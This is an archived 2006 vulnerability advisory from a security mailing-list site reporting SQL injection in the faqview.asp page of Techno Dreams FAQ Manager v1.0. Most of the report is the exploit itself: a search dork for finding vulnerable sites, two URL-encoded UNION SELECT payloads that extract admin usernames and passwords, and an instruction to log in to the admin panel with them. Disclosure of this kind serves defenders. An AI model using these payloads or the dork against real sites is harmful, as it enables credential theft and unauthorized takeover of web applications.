Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  BizDirectory all version xss

  PhotoPost PHP  4.6 - 4.5 [PP_PATH] >> Remote File Include Vulnerability

  Sql injection in Moodle

  MyBB 1.2 Full path and Cross site scripting vulnerabilities

From:ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:19 сентября 2006 г.
Subject:Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability

Vulnerability Report
*******************************************************************************
# Title  :  Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Dork :   faqview.asp?key

# Script Page : http://www.t-dreams.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/faqview.asp?key=[SQL HERE]

Example:

//faqview.asp?key=-1%20union%20select%200,0,username,password,
0%20from%20admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,
0%20from%20admin

With admin username and password take it,after join to login page: ../[path]/admin/

# ajann,Turkey
# ...
# Im not Hacker!

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru
test server